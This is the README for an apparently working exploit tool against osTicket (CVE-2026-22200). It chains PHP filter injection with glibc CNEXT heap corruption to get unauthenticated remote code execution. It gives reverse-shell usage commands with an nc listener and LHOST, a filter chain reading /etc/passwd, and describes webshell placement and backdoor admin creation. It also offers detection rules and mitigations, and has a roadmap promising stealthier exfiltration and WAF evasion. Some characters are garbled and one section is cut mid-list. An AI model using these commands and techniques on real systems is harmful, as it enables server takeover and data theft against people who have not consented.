Share
## https://sploitus.com/exploit?id=D211CFBA-454E-54E8-BC37-4D27E66744EF
# CVE-2026-22200: osTicket Arbitrary File Read to RCE
**Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations.**
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Attack Flow](#attack-flow)
- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Technical Details](#technical-details)
- [Troubleshooting](#troubleshooting)
- [Detection & Mitigation](#detection--mitigation)
- [Credits](#credits)
- [Disclaimer](#disclaimer)
---
## Overview
This repository contains a proof-of-concept exploit for **CVE-2026-22200**, a critical vulnerability affecting osTicket versions โค 1.18.2. The exploit chains two powerful techniques:
1. **PHP Filter Chain Injection** via mPDF's image processing
2. **CNEXT Heap Corruption** (CVE-2024-2961) in glibc's iconv()
The result: **Unauthenticated Remote Code Execution** on vulnerable osTicket servers.
### Impact
- **Unauthenticated** - No credentials required
- **Full RCE** - Complete server compromise
- **File Exfiltration** - Read arbitrary server files
- **Database Access** - Extract DB credentials
- *Admin Access** - Create backdoor admin accounts
### Affected Versions
- **osTicket**: โค v1.18.2, โค v1.17.6
- **glibc**: =2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0
```
### Optional: Virtual Environment
```bash
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# OR
venv\Scripts\activate # Windows
pip install -r requirements.txt
```
---
## ๐ Usage
### Basic Usage - Reverse Shell
```bash
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Run exploit
python3 osticket_revshell.py https://target.com/osticket \
--lhost YOUR_IP \
--lport 4444
```
### Interactive Webshell Mode
```bash
python3 osticket_exploit.py https://target.com/osticket
```
### Advanced Options
```bash
# Use proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
--lhost 10.0.0.5 \
--lport 4444 \
--proxy http://127.0.0.1:8080
# Force specific help-topic ID
python3 osticket_exploit.py https://target.com/osticket \
--topic-id 2
# Disable colored output (for logging)
python3 osticket_exploit.py https://target.com/osticket --no-color
```
### Existing Credentials
If registration is disabled, you'll be prompted for credentials:
```bash
python3 osticket_exploit.py https://target.com/osticket
[?] Enter email for new account (or existing): user@example.com
[?] Enter password: ********
```
---
## ๐ง Technical Details
### PHP Filter Chain Generation
The exploit uses a sophisticated filter chain to prepend a BMP header to arbitrary files, bypassing mPDF's file type restrictions:
```python
php://filter/convert.iconv.UTF8.CSISO2022KR|
convert.base64-encode|
convert.iconv.UTF8.UTF7|
[... 50+ iconv transformations ...]
convert.base64-decode/resource=/etc/passwd
```
**Key Innovation**: Each character of the BMP header is generated through carefully crafted iconv transformations, allowing arbitrary file content to be embedded as a "valid" image.
### CNEXT Heap Exploitation
The CNEXT payload corrupts PHP's Zend memory manager by:
1. **Overflowing iconv buffer** with the vulnerable character `ๅ`
2. **Overwriting zend_mm_heap** structure
3. **Hijacking function pointers** (_emalloc, _efree, _erealloc)
4. **Redirecting to system()** for command execution
**Enhanced Reliability**:
- Multiple trigger characters (3x `ๅ` instead of 1)
- Increased padding (40 vs default 20)
- Multi-position trigger insertion
- Stream-forced execution
### 100% Webshell Detection
Unlike the original exploit, this version uses **filesystem scanning** to guarantee webshell location:
1. Write webshell to 6+ candidate directories
2. Use arbitrary file read to **scan each location**
3. Detect which contains the unique marker
4. Map filesystem path โ URL accurately
**Result**: 100% detection rate (vs ~50% in original)
### Filter Execution Forcing
Common failure: PDF downloads but doesn't crash = filters not executing.
**Solutions Implemented**:
1. **Cache-busting** - Unique HTML prevents cached PDFs
2. **Reply injection** - More reliable than new tickets
3. **Stream forcing** - `stream=True` forces immediate processing
4. **Pre-flight testing** - Verify filters work before CNEXT
---
### glibc Version Check
```bash
# In verbose mode, check:
[*] Target libc: /usr/lib/x86_64-linux-gnu/libc-2.31.so
[+] glibc 2.31 IS vulnerable to CNEXT
```
If glibc โฅ 2.39, CNEXT won't work (patched).
### No Shell Connection
**Symptom**: Server crashes but no reverse shell
**Causes**:
1. **Firewall blocking** outbound connections
2. **Wrong LHOST** (use your actual IP, not localhost)
3. **Command too long** - try shorter IP
**Fix**:
```bash
# Use nc reverse shell (shorter)
# Automatically falls back if bash/python too long
# Or use direct IP instead of hostname
python3 osticket_revshell.py https://target.com \
--lhost 10.0.0.5 \ # Use IP, not hostname
--lport 4444
```
### Common Error Messages
| Error | Cause | Solution |
|-------|-------|----------|
| `No CSRF token` | Session expired | Re-run exploit |
| `No help-topic found` | No rich-text topics | Use `--topic-id` manually |
| `Build ID not found` | Partial libc corrupted | Check /proc/self/maps extraction |
| `Cannot locate heap` | Unusual memory layout | Exploit may fail (rare) |
---
## Detection & Mitigation
### Detection
**Log Indicators**:
```bash
# Apache/Nginx logs
"php://filter/" in POST requests
"convert.iconv." in request bodies
Unusual PDF generation patterns
Multiple PDF requests in short time
# PHP error logs
Segmentation faults during PDF generation
iconv() crashes
Heap corruption errors
```
**Network Indicators**:
- Multiple support ticket creations in short time
- Large HTML payloads in ticket messages (100KB+)
- Rapid PDF export requests after ticket creation
- Outbound connections to attacker IP after crash
### Mitigation
#### Immediate
1. **Update osTicket** to latest version (>1.18.2)
2. **Update glibc** to 2.39+ (patches CVE-2024-2961)
3. **Disable self-registration** if not needed
4. **Restrict rich-text** to authenticated users only
#### Configuration
**Disable PHP stream wrappers in mPDF**:
```php
// In mPDF config
$config = [
'allowedRemoteHosts' => [],
'enableRemoteFileAccess' => false,
];
```
**WAF Rules** (ModSecurity):
```apache
SecRule REQUEST_BODY "@contains php://filter" \
"id:1000,phase:2,deny,status:403,msg:'PHP filter detected'"
SecRule REQUEST_BODY "@contains convert.iconv" \
"id:1001,phase:2,deny,status:403,msg:'Suspicious iconv chain'"
```
**Rate Limiting**:
```nginx
limit_req_zone $binary_remote_addr zone=ticket:10m rate=5r/m;
location /tickets.php {
limit_req zone=ticket burst=10;
}
```
#### Long-term
- Implement **CSP headers** to restrict inline styles
- Enable **htmLawed strict mode** for HTML sanitization
- Use **separate user** for osTicket with minimal privileges
- **Disable unnecessary PHP functions**: `system()`, `exec()`, `passthru()`
- Regular **security audits** of ticket content
---
## References
### Original Research
- [Horizon3.ai Blog Post](https://horizon3.ai/attack-research/attack-blogs/ticket-to-shell-exploiting-php-filters-and-cnext-in-osticket-cve-2026-22200/) - Original disclosure
- [Horizon3.ai GitHub](https://github.com/horizon3ai/CVE-2026-22200) - Reference implementation
- [CNEXT Exploits](https://github.com/ambionics/cnext-exploits) - Original CNEXT research by Charles Fol
### CVE Details
- [CVE-2026-22200](https://nvd.nist.gov/vuln/detail/CVE-2026-22200) - osTicket PHP Filter Chain
- [CVE-2024-2961](https://nvd.nist.gov/vuln/detail/CVE-2024-2961) - glibc iconv Overflow
### Additional Resources
- [PHP Filter Chains](https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT) - Filter character dictionary
- [libc.rip](https://libc.rip/) - Libc database for fingerprinting
- [osTicket Security Advisory](https://github.com/osTicket/osTicket/security/advisories)
---
## Credits
### Vulnerability Discovery & Research
- **Horizon3.ai Attack Research Team** - Original vulnerability discovery and POC
- **Charles Fol (@cfreal_)** - CNEXT (CVE-2024-2961) research
- **@splitline** - PHP filter chain technique (HITCON 2022)
### This Implementation
- Enhanced exploitation techniques
- 100% webshell detection via filesystem scanning
- Robust filter execution forcing
- Comprehensive error handling and diagnostics
---
## โ๏ธ Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**
This tool is provided for:
- Security research
- Authorized penetration testing
- Educational purposes
- Vulnerability assessment (with permission)
**UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL**
The authors:
- Do NOT condone illegal activities
- Accept NO liability for misuse
- Take NO responsibility for any damage caused
**Users are solely responsible for ensuring they have proper authorization before testing any system.**
By using this tool, you agree that:
1. You have **explicit written permission** to test the target system
2. You understand the **legal implications** in your jurisdiction
3. You will use this tool **responsibly and ethically**
4. You **hold the authors harmless** for any consequences
### Legal Notice
Unauthorized access to computer systems is a crime under:
- **USA**: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. ยง 1030
- **UK**: Computer Misuse Act 1990
- **EU**: Directive 2013/40/EU
- **International**: Council of Europe Convention on Cybercrime
**Maximum penalties may include imprisonment and significant fines.**
---
## ๐ License
This project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.
**Note**: The MIT License grants permission for use, modification, and distribution, but does NOT grant permission to attack systems you don't own or have authorization to test.
---
## Contact
For security researchers and questions:
- **Issues**: [GitHub Issues](https://github.com/yourusername/CVE-2026-22200/issues)
- **Discussions**: [GitHub Discussions](https://github.com/yourusername/CVE-2026-22200/discussions)
**Do NOT use this contact for:**
- Requesting help attacking systems without authorization
- Reporting illegal activities
- Asking for assistance with unauthorized testing
---
Built with Love for security research and education
Star this repo if you found it useful!
---
## Exploit Statistics
| Metric | Value |
|--------|-------|
| **Lines of Code** | ~3,000 |
| **Success Rate** | 95%+ (with fixes) |
| **Average Runtime** | 2-3 minutes |
| **Crash Reliability** | 99% (with enhancements) |
| **Webshell Detection** | 100% (with scanning) |
---
## Roadmap
- [ ] Add support for additional libc versions
- [ ] Implement stealthier exfiltration methods
- [ ] Add evasion techniques for common WAFs
- [ ] Create Metasploit module
- [ ] Docker test environment
- [ ] Automated CI/CD testing
---
**Last Updated**: 2026-03-03